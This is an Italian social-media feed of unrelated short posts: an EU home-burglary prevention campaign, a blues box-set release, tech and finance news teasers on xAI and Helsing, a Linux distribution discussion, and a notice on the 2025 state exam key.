La campagna di prevenzione #StopDomesticBurglaries si compone di un poster, un volantino, tre brevi post intranet, uno spot radiofonico e un filmato. Il filmato include iniziative degli Stati membri e ispira i partner nazionali a partecipare a questa iniziativa. L'EUCPN ha anche redatto il documento "Cosa funziona per prevenire i furti in casa?", per supportare gli stakeholder europei, nazionali e locali offrendo una panoramica delle iniziative che potrebbero, o meno, essere efficaci per prevenire i furti in casa. Il documento in italiano è visionabile escaricabile qui eucpn.org/sites/default/files/…
Quest'anno la campagna si è concentrata sull'informare i cittadini che possono proteggere la propria casa dai furti in casa e che non deve essere costoso. L'utilizzo di serrature robuste per porte, illuminazione esterna con sensore, serrature robuste per finestre e illuminazione interna con timer rappresenta la combinazione più efficace per prevenire i furti in casa.
I 22 paesi europei partecipanti nel 2025 sono stati Albania, Belgio, Bulgaria, Repubblica Ceca, Danimarca, Finlandia, Germania, Grecia, Islanda, Irlanda, Italia, Lettonia, Lituania, Lussemburgo, Macedonia, Malta, Polonia, Portogallo, Romania, Spagna, Ucraina e Regno Unito.

@Notizie dall'Italia e dal mondo

Questa voce è stata modificata (2 mesi fa)


Antone’s 50th Allstars – 50 Years of the Blues il box in uscita a fine agosto
freezonemagazine.com/news/anto…
La Antone’s Records compie 50 anni quest’anno, e per celebrarne la ricorrenza questa pubblicazione appare un po come “l‘ultimo vero album di Texas Blues”. L’album presenta un sorprendente assortimento di artisti che coverizzano, suonano e reinterpretano un catalogo di canzoni classiche del blues. Registrato


Perché xAi di Musk ha bisogno di tanti soldi

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
xAi, la startup di intelligenza artificiale di Elon Musk, sta cercando di raccogliere nuovi finanziamenti per 4,3 miliardi di dollari, in aggiunta a un'operazione sul debito da 5 miliardi. L'azienda spende 1 miliardo al mese, ma le entrate sono ancora



è uno dei motivi per cui io odio windows e anche le distro linux non rolling release. non c'è da fare nessuna migrazione ma solo da passare aggiornamenti.

informapirata ⁂ reshared this.

in reply to simona

pure loro via via fanno casini... tipo adesso questa di X11 pare un vero pasticciaccio sinceramente. non ho ancor capito, io che uso wayland ma amo poter scegliere al volo cosa usare, almeno potenzialmente, come avere anche kde con x11 adesso. la procedura non pare chiara.
in reply to simona

ma la cosa bella è che arch quando installi servizi non te li avvia di default. per me è importante. poi aur è comodo anche se a volte le dipendenze si incasinano parecchio.


Perché il ceo di Spotify investe sulla startup della difesa tedesca Helsing?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
La startup tedesca della difesa Helsing ha raccolto 600 milioni di euro nell'ultimo round di investimenti guidatO da Prima materia, la società di investimento di Daniel Ek,



#Maturità2025, la chiave ministeriale per aprire il plico telematico della seconda prova scritta, è disponibile sul sito del #MIM.

La trovate qui ▶️ mim.gov.it/web/guest/-/esami-d…

#MIMaturo